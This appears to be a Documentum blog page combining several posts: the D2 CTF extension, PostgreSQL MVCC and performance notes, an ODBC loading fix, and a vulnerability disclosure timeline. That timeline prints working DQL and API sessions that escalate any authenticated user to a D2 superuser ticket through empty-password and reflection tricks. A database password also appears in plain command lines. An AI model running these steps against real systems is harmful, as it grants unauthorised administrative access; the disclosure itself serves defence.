D2 (and Webtop and xCP) CTF

Alvaro de Andres' Blog

CTF (Content Transfer Framework) is what Dell EMC calls their “new UCF”. It works as a browser extension, and is the same extension you’ve used for the latest version of Webtop (new functionality getting to Webtop first? LOL). And this mode is not the default (why?), so you’ll need to change it in the settings.properties file of D2.

Also, this extension generates some “index” files in the folder where you download files:

  • .checkout.xml
  • .d2_edit_storage.json
  • .d2_view_storage.json
  • .view.xml

These contain the object names, ids, operation performed, and folder paths of the transferred files.

Tested on latest Firefox Nightly x64 and Chrome.

FYI, I’m pasting the “wonderful” ASCII compatibility matrix provided by Dell in the configuration file:

#     +-------------------+------+------+------+------+
#     | Browser:OS Mode   | Thin | Java | ctf  | Note |
#     +-------------------+------+------+------+------+
#     | IE 11             | yes  | yes  | yes  |      |
#     +-------------------+------+------+------+------+
#     | Edge              | yes …


Say goodbye LockBox. Part II

Wow, interesting news came from where I did not expect it: the ECN guys state that EMC has stopped torturing customers and given up on the idea of using RSA Lockbox.

Here’s a little history of the Lockbox story that you might want to read:

November 2013

Reported to EMC through the support portal, with a proof of concept showing how any authenticated user could gain superuser privileges: D2GetAdminTicketMethod accepts an empty password and writes the resulting superuser DM_TICKET into a c6_method_return object that the caller created and can read back:

1> create c6_method_return object set message='test' 
2> go 
object_created 
-------------- 
00002ee280000e9b 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d2 -password "" -method_return_id 00002ee280000e9b' 
3> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002ee280000e9b' 
2> go 
message 
-------------- 
DM_TICKET=T0..... 
(1 row affected)

January 2014

EMC released Documentum D2 v4.2 and some patches for previous versions; no CVE was announced. The EMC “solution” was to encrypt the data passed through c6_method_return objects.

February 2014

Discovered a reflection attack on the D2GetAdminTicketMethod method: the encrypted message is copied back into a parameter of the same object, the method decrypts it as the -timeout value, and the resulting NumberFormatException writes the plaintext ticket into the error attribute:

1> create c6_method_return object set message='test' 
2> go 
object_created 
---------------- 
00002f0a8000291d 
(1 row affected) 
1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global -timeout 3600' 
4> go 
... 
(1 row affected) 
1> select message from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- now message contains encrypted data 
--- 
message 
---------------------------------------------------------------------------- 
AAAAEMm1Ypog8dNWsELGoge38HRKVIUnN4/vw4rmz8xJ7EcZuOaQ8rT6vAktbc8g5qV07pme7nt2 
hG4D+ljeR2G5JCystXA8JDDaxmM5xjNfwshe9YldFZBlSinYBvFdigpuZCmTFES+n1b5ZbVC/L7b 
aZ7UI1LI06YhJvRcVjB9mzwMENk8H7KaxDXiFBCEQSiNNn5DoXwjZPWLJd9WTdXIlXpPzWAR2KG+ 
... 
(1 row affected)
1> update c6_method_return object 
2> set parameter_name[0]='-timeout', 
3> set parameter_value[0]=(select message from c6_method_return 
4> where r_object_id='00002f0a8000291d') 
5> where r_object_id='00002f0a8000291d' 
6> go 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

1> execute do_method with method='D2GetAdminTicketMethod', 
2> arguments='-docbase_name d242 -password "" -method_return_id 00002f0a8000291d 
3> -scope global' 
4> go 
... 
(1 row affected) 

1> select error from c6_method_return where r_object_id='00002f0a8000291d' 
2> go 
--- 
--- Here NumberFormatException occurs and the unencrypted ticket is written
--- to error field of c6_method_return object 
--- 
error 
---------------------------------------------------------------------------- 
For input string: "DM_TICKET=T0JKIE5VTEwgMAoxMwp2ZXJzaW9uIElOVCBTIDAKMwpmbGFncyBJTlQ 
(1 row affected)

March 2014

EMC released the P01 patch for EMC Documentum D2 v4.2; no CVE was announced. The vendor “solution” was to not store the exception message in the “error” attribute of the c6_method_return object if the message contains the “DM_TICKET” character sequence: a substring blacklist on one output channel, while the method kept decrypting whatever parameters it was handed.

April 2014

Discovered another reflection attack, this time based on the verbose logging of D2GetAdminTicketMethod: with SAVE_RESULTS set, the method's execution log, which prints every argument after decryption, is stored as a content file that the caller can read:

API> create,c,c6_method_return 
... 
000224838000011f 
API> save,c,l 
... 
OK 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global 
-timeout 3600 
' 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
API> revert,c,000224838000011f 
... 
OK 
API> get,c,000224838000011f,message 
... 
AAAAEFRN36mfm+NAm49DQAZol1fSBbIgoELusFMnk4eE6r3qNPm/83NDxqiFyoe7Yt/GOjASn6v2 
v2XjSaJq5MqGK8PgrNPbNz5KSAzxcKTWorJym/7ceZsp9l5pSUcDr1mj8xKg0M/iH8AIS8ZGZ9/L 
2bd1FOth86ISN2OnAIOAlzh32I0/YcLYt7nSSfFWDL9H9qzzkp6Za/NeZt4Z0kE1gYNPaVrlPD4D 
qC4bcSb3p54VeAZCVOgpUp3sJ+8kevoRQSKckOTSinBYF4qQa9pnNYQx8wczFk2/pM0pkCdDigyT 
... 

API> ?,c,update c6_method_return object 
set parameter_name[0]='-timeout', 
set parameter_value[0]=(select message from c6_method_return 
where r_object_id='000224838000011f') 
where r_object_id='000224838000011f' 
objects_updated 
--------------- 
1 
(1 row affected) 
[DM_QUERY_I_NUM_UPDATE]info: "1 objects were affected by your UPDATE statement." 

--- 
--- Here we put extra parameter "SAVE_RESULTS,B,T" to save execution results 
--- of D2GetAdminTicketMethod docbase method 
--- 
API> apply,c,,DO_METHOD,METHOD,S,D2GetAdminTicketMethod, 
ARGUMENTS,S,' 
-docbase_name d2 
-password "" 
-method_return_id 000224838000011f 
-scope global -timeout 3600 
', 
SAVE_RESULTS,B,T 
... 
q0 
API> next,c,q0 
... 
OK 
API> dump,c,q0 
... 
USER ATTRIBUTES 

result : 0902248380002a67 
result_doc_id : 0902248380002a67 
process_id : 0 
launch_failed : F 
method_return_val : 0 
os_system_error : No Error 
timed_out : F 
time_out_length : 100 
app_server_host_name : test 
app_server_port : 9080 
app_server_uri : /DmMethods/servlet/DoMethod 
error_message : 

SYSTEM ATTRIBUTES 


APPLICATION ATTRIBUTES 


INTERNAL ATTRIBUTES 


API> close,c,q0 
... 
OK 
--- 
--- Now message contains encrypted data and error is empty 
--- 
API> get,c,000224838000011f,message 
... 
AAAAEBBMjU2FE27RAOiKSkZdJZM7tl1ht+LhqjvPsmr9DPg3nVgGFyROrETPX6Wy8uuEWbtKSWs3 
MNr8qe3EBNTejbieKZ2YzzUY/46fLdbOQFInczwrNCBoWF9zBnTlhoHK1f+ctpm9nUsK2wJbDZXb 
mk6+1VO5RsUEuFV/qux5LBdXpIr7dRornpDJiBP5hoPILObq4++KvBfhZjaPxEnoOMksfwgmU8XC 
... 
--- 
--- But execution results do contain unencrypted ticket 
--- 
API> get,c,000224838000011f,error 
... 

API> getpath,c,0902248380002a67 
... 
/u01/documentum/cs/data/d2/content_storage_01/00022483/80/00/09/e1.txt 
API> quit 
Bye 
~]$ cat content_storage_01/00022483/80/00/09/e1.txt 
==== START ======================================================= 
D2-API v4.2.0010 build 378 
DFC version : 7.1.0020.0120 
file.encoding : UTF-8 
Arguments : {-docbase_name=d2, 
-method_return_id=000224838000011f, 
-password=, 
-class_name=com.emc.d2.api.methods.D2GetAdminTicketMethod, 
-scope=global, 
-timeout=DM_TICKET=T0JKIE5VTEwgMAoxMwp.... 
} 
-Scope : global 
-TimeOut : 3600 
-SingleUse : true 
==== END (0.095s) ================================================
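The flaw that both the February and April findings above exploit, modelled in Python as an added example (this is not D2 code; the cipher, key, ticket and object layout are constructed stand-ins for the Lockbox-protected encryption and the c6_method_return object, and the assumption that the method transparently decrypts any parameter that looks like its own ciphertext is what the two reflections imply). The three modes show the pre-P01 behaviour, the P01 “DM_TICKET” substring filter, and a hardened version that never applies the secret to caller-supplied values and never reflects them into an error or a log:

```python
"""Toy model of the D2GetAdminTicketMethod reflection attacks (added example, not D2 code).

The method writes the admin ticket only in encrypted form, but it also decrypts any
parameter handed to it and then reflects that parameter into something the caller can
read: the error attribute (exception text) or, after P01, the SAVE_RESULTS log. Each
such channel is a decryption oracle for the ticket. Cipher, key, ticket and object
layout are constructed stand-ins, not Lockbox or D2 internals.
"""
import base64
import hashlib
import hmac
import os

KEY = b"constructed-demo-key, stands in for the Lockbox-held secret"
ENC_PREFIX = "AAAA"   # assumption: how the method recognises its own ciphertext
ADMIN_TICKET = "DM_TICKET=T0constructed-not-a-real-ticket"   # constructed


def _keystream(nonce: bytes, length: int) -> bytes:
    """HMAC-SHA256 in counter mode: a deliberately simple toy stream cipher."""
    out, counter = b"", 0
    while len(out) < length:
        out += hmac.new(KEY, nonce + counter.to_bytes(4, "big"), hashlib.sha256).digest()
        counter += 1
    return out[:length]


def encrypt(plaintext: str) -> str:
    nonce = os.urandom(16)
    data = plaintext.encode()
    ct = bytes(a ^ b for a, b in zip(data, _keystream(nonce, len(data))))
    return ENC_PREFIX + base64.b64encode(nonce + ct).decode()


def decrypt(blob: str) -> str:
    raw = base64.b64decode(blob[len(ENC_PREFIX):])
    nonce, ct = raw[:16], raw[16:]
    return bytes(a ^ b for a, b in zip(ct, _keystream(nonce, len(ct)))).decode()


class MethodReturn:
    """Stand-in for a c6_method_return object: the attacker can write
    parameter_name/parameter_value and read message, error and the log."""

    def __init__(self):
        self.message = ""
        self.error = ""
        self.parameter_name = []
        self.parameter_value = []
        self.log = []   # stands in for the SAVE_RESULTS content file


def run_method(obj: MethodReturn, args: dict, mode: str):
    """One DO_METHOD execution. mode is "vulnerable" (pre-P01), "p01" (error dropped
    when it contains DM_TICKET) or "hardened". Parameters stored on the object
    override ARGUMENTS, which is what the UPDATE statements on the page rely on."""
    params = dict(args)
    params.update(zip(obj.parameter_name, obj.parameter_value))
    if mode == "hardened":
        # Caller-supplied values are opaque: never run them through the secret,
        # never echo them. The log gets parameter names only.
        obj.log.append("Arguments : " + repr(sorted(params)))
    else:
        # Flaw 1: anything that looks like the method's own ciphertext is decrypted,
        # including a ciphertext the caller copied out of `message`.
        params = {k: decrypt(v) if v.startswith(ENC_PREFIX) else v for k, v in params.items()}
        # Flaw 2: the verbose log echoes the decrypted values.
        obj.log.append("Arguments : " + repr(params))
    try:
        timeout = int(params.get("-timeout", "3600"))
    except ValueError as exc:
        text = str(exc)   # embeds the bad value, like Java's "For input string:"
        if mode == "vulnerable":
            obj.error = text                                   # Flaw 3: reflected into error
        elif mode == "p01":
            obj.error = "" if "DM_TICKET" in text else text    # the substring blacklist
        else:
            obj.error = "invalid -timeout"                     # generic, value never reflected
        return None
    obj.error = ""
    obj.message = encrypt(ADMIN_TICKET)
    return timeout


def attack(mode: str) -> list:
    """The two-step reflection from the page; returns the channels that leak the ticket."""
    obj = MethodReturn()
    args = {"-docbase_name": "d2", "-password": "", "-scope": "global", "-timeout": "3600"}
    run_method(obj, args, mode)           # call 1: message now holds the encrypted ticket
    obj.parameter_name = ["-timeout"]     # copy that ciphertext back as a parameter ...
    obj.parameter_value = [obj.message]
    run_method(obj, args, mode)           # call 2: ... and let the method decrypt it for us
    leaks = []
    if ADMIN_TICKET in obj.error:
        leaks.append("error")
    if any(ADMIN_TICKET in line for line in obj.log):
        leaks.append("log")
    return leaks


if __name__ == "__main__":
    for m in ("vulnerable", "p01", "hardened"):
        print(f"{m:10s} leaks via: {attack(m) or 'nothing'}")
```

Running it prints which channel leaks in each mode. The lesson for the fix is that the leak is a property of the data flow (a value derived from the secret, decrypted, then written to a caller-readable sink), so removing one sink at a time, as P01 did, only moves the oracle; the hardened variant closes it by treating stored parameters as opaque and logging only their names.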

August 2014

EMC announced CVE-2014-2515; the fix was intended to mitigate the reflection attacks described above.

August 2014

Discovered another set of vulnerabilities in the implementation of the “protection” of the D2GetAdminTicketMethod method. The basic idea: an attacker was able to delete any file from the Content Server filesystem, and once the Lockbox file was deleted D2 fell back to the default passphrase (i.e. the one used by com.emc.d2.api.utils.GetCryptedPassword), so the secret the whole scheme rests on could be replaced by anyone who could delete a file.

August 2014

EMC announced CVE-2015-4537

February 2015

I got tired and proved that RSA Lockbox is not a security solution: RSA LOCKBOX MAGIC 🙂.

Check and mate.

PostgreSQL performance

Yesterday I was playing with Documentum/PostgreSQL installed into Docker container trying to either prove or refute the following statement from release notes:

It is not clear how EMC arrived at such “promising” results, because everything I know about PostgreSQL says that a “15% performance gap” is too optimistic. Let me explain.

First of all, I do not want to put all the blame on PostgreSQL: it is just a database that plays in the second league (for the record: Oracle plays in the premier league, MSSQL in the first league). I am not going to argue that thoroughly here, but the basic point is that PostgreSQL is thin on diagnostics and on backup and recovery tooling, and the tools that do exist are easy to misread. The example below shows how “explain analyze” can report a time that has nothing to do with reading the data: the 1 MB a2 values are too large for the heap page and are stored out of line in the table’s TOAST relation, and EXPLAIN ANALYZE discards the result rows without ever detoasting them, so the “seq scan” only touches the 5120 narrow heap tuples holding TOAST pointers. Compare pg_relation_size('t1') with pg_total_relation_size('t1'), or run explain (analyze, buffers) on a query that actually consumes the column, such as select sum(length(a2)) from t1, and the missing gigabytes show up in both the buffer counts and the time:

--
-- I create 5Gb table in database and PostgreSQL reports that 
-- it is able to read all data from this table in 1 ms.
-- Fuck yeah, PostgreSQL turned my MBP into a supercomputer
--
postgres=# create table t1 as select lpad('x',100,'x') as a1, 
postgres-#                  (SELECT array_to_string(ARRAY(SELECT chr((65 + round(random() * 25)) :: integer) 
postgres(#                    FROM generate_series(1,1024*1024)), '')
postgres(#                  ) as a2 from generate_series(1,5*1024);
SELECT 5120
postgres=# explain analyze select a2 from t1;
                                             QUERY PLAN                                              
-----------------------------------------------------------------------------------------------------
 Seq Scan on t1  (cost=0.00..145.20 rows=5120 width=18) (actual time=0.023..0.758 rows=5120 loops=1)
 Planning time: 3.140 ms
 Execution time: 0.963 ms
(3 rows)

postgres=# explain analyze select a2 from t1;
                                             QUERY PLAN                                              
-----------------------------------------------------------------------------------------------------
 Seq Scan on t1  (cost=0.00..145.20 rows=5120 width=18) (actual time=0.010..1.056 rows=5120 loops=1)
 Planning time: 0.033 ms
 Execution time: 1.380 ms
(3 rows)

postgres=# 

Now, why I doubt that “15% performance gap” is realistic.

The main problem is the MVCC implementation in PostgreSQL: every time you update a row, PostgreSQL creates a new version of the row and stores it in another place (the old version stays behind as a dead tuple until VACUUM reclaims it). Note how the ctid, the physical location of the row, changes on every update:

postgres=# create table t1(a1 int);
CREATE TABLE
postgres=# insert into t1 values(1);
INSERT 0 1
postgres=# begin;
BEGIN
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,1) |  1
(1 row)

postgres=# update t1 set a1=2;
UPDATE 1
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,2) |  2
(1 row)

postgres=# update t1 set a1=3;
UPDATE 1
postgres=# select ctid, a1 from t1;
 ctid  | a1 
-------+----
 (0,3) |  3
(1 row)

and such behaviour leads to the following conclusions:

  • wide tables do not like updates: the whole row, not just the changed column, has to be copied
  • every update has to touch all of the table’s indexes, unless it qualifies as a HOT (heap-only tuple) update, which requires that no indexed column changed and that the new version fits on the same page

My experience (comparison with Oracle, single user) is the following:

  • inserts (creation of objects) are 15% slower
  • updates are 50% slower

Weird Can’t open lib ‘/usr/pgsql-9.5/lib/psqlodbcw.so’ : file not found error

I have read a couple of posts on ECN and found that people experience difficulties when installing the Documentum/PostgreSQL build: they get something like:

[dmadmin@docu73dev01 bin]$ dmdbtest -Ddctm_psql -SDCTM_PSQL -Udctm_psql -PLWlW2k0CbEne
Failed to make a database connection using the following data:
   Database Server: DCTM_PSQL
   Database Name  : dctm_psql
   User Name      : dctm_psql
   User Password  : Check either the -P flag on command line or 
                    the password file specified in your server.ini
  Error from database system is:  STATE=01000, CODE=0, MSG=[unixODBC][Driver Manager]Can't open lib '/usr/pgsql-9.5/lib/psqlodbcw.so' : file not found
ERROR(-1)   (system code: -1)
[dmadmin@docu73dev01 bin]$ ls -la /usr/pgsql-9.5/lib/psqlodbcw.so
-rwxr-xr-x 1 root root 436904 Aug 27 14:02 /usr/pgsql-9.5/lib/psqlodbcw.so
[dmadmin@docu73dev01 bin]$ file dmdbtest 
dmdbtest: setuid setgid ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.18, BuildID[sha1]=6a65a8e84e78f9745a5c4ad6e5e695ec30e58b56, not stripped
[dmadmin@docu73dev01 bin]$ file /usr/pgsql-9.5/lib/psqlodbcw.so
/usr/pgsql-9.5/lib/psqlodbcw.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=bde7b12fe740dc03718b62030ba27ad0a1007dce, stripped
[dmadmin@docu73dev01 bin]$ 

i.e. all the files exist and the architecture matches, yet the installation fails, and the best recipe so far has been to download the docker image from the support portal and extract the ODBC drivers from it. Good job, EMC. Stranger still, I do not experience such difficulties. Follow my hands. The “file not found” text is unixODBC’s wording for any dlopen() failure, not what dlerror() actually reported, and what fails to load here is not psqlodbcw.so itself but a dependency: Documentum ships its own liblber-2.4.so.2 in its bin directory, which the loader finds before the system copy that the system libldap (pulled in through libpq) expects. That is the most likely reading of why renaming the bundled copy is all it takes:

[dmadmin@docu73dev01 bin]$ mv liblber-2.4.so.2 liblber-2.4.so.2.bak
[dmadmin@docu73dev01 bin]$ dmdbtest -Ddctm_psql -SDCTM_PSQL -Udctm_psql -PLWlW2k0CbEne
Database successfully opened.
Test table successfully created.
Test view successfully created.
Test index successfully created.
Insert into table successfully done.
Index successfully dropped.
View successfully dropped.
Database case sensitivity test successfully past. 
Table successfully dropped.
[dmadmin@docu73dev01 bin]$
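The two checks worth running before reaching for the docker image, as an added example in Python (not from the post; the directory layout in demo() is constructed, and the RHEL-style system library directories are an assumption): dlopen_error() surfaces the real dlerror() text that unixODBC hides behind “file not found”, and shadowed_sonames() walks LD_LIBRARY_PATH ahead of the system directories, as ld.so does, to report any soname that is provided twice, which is the situation the mv above resolves.

```python
"""Added example, not from the post: show the real dlopen() error behind unixODBC's
generic "file not found", and find sonames that a directory early on LD_LIBRARY_PATH
shadows. The layout built in demo() is constructed; SYSTEM_LIB_DIRS is an assumption."""
import ctypes
import os
import tempfile

SYSTEM_LIB_DIRS = ("/lib64", "/usr/lib64", "/lib", "/usr/lib")   # assumption: RHEL-style layout


def dlopen_error(path: str):
    """Return None if `path` loads, otherwise the dlerror() text. unixODBC reports
    every failure here as "file not found"; this shows what dlopen() actually said
    (missing dependency, bad ELF header, symbol version mismatch, ...)."""
    try:
        ctypes.CDLL(path)
        return None
    except OSError as exc:
        return str(exc)


def soname_providers(soname: str, search_dirs) -> list:
    """Every file named `soname` in `search_dirs`, in search order. The first hit is
    the one the dynamic loader will use; the remaining hits are shadowed by it."""
    return [os.path.join(d, soname) for d in search_dirs
            if os.path.isfile(os.path.join(d, soname))]


def shadowed_sonames(sonames, ld_library_path: str, system_dirs=SYSTEM_LIB_DIRS) -> dict:
    """Map each soname found in more than one place to its providers. LD_LIBRARY_PATH
    entries are searched before the system directories, as ld.so does."""
    dirs = [d for d in ld_library_path.split(":") if d] + list(system_dirs)
    result = {}
    for name in sonames:
        hits = soname_providers(name, dirs)
        if len(hits) > 1:
            result[name] = hits
    return result


def demo() -> dict:
    """Constructed layout: a product 'bin' directory ships its own liblber ahead of
    the system copy, exactly the shape of the problem the mv on the page fixes."""
    with tempfile.TemporaryDirectory() as tmp:
        bundled = os.path.join(tmp, "documentum", "bin")
        system = os.path.join(tmp, "usr", "lib64")
        for d in (bundled, system):
            os.makedirs(d)
            with open(os.path.join(d, "liblber-2.4.so.2"), "wb") as fh:
                fh.write(b"not a real shared object")   # constructed stand-in; will not load
        shadow = shadowed_sonames(["liblber-2.4.so.2", "libpq.so.5"],
                                  ld_library_path=bundled, system_dirs=(system,))
        err = dlopen_error(os.path.join(bundled, "liblber-2.4.so.2"))
        return {
            "shadowed": {k: [os.path.relpath(p, tmp) for p in v] for k, v in shadow.items()},
            "dlopen_error": err,
        }


if __name__ == "__main__":
    print(demo())
    # On a real Documentum host, point these at the actual driver and search path:
    print(dlopen_error("/usr/pgsql-9.5/lib/psqlodbcw.so"))
    print(shadowed_sonames(["liblber-2.4.so.2", "libldap-2.4.so.2"],
                           os.environ.get("LD_LIBRARY_PATH", "")))
```

On a broken host, dlopen_error() on psqlodbcw.so prints the dependency that really failed instead of “file not found”, and shadowed_sonames() lists the bundled copy first; `LD_DEBUG=libs` on the dmdbtest command gives the same answer from the loader itself.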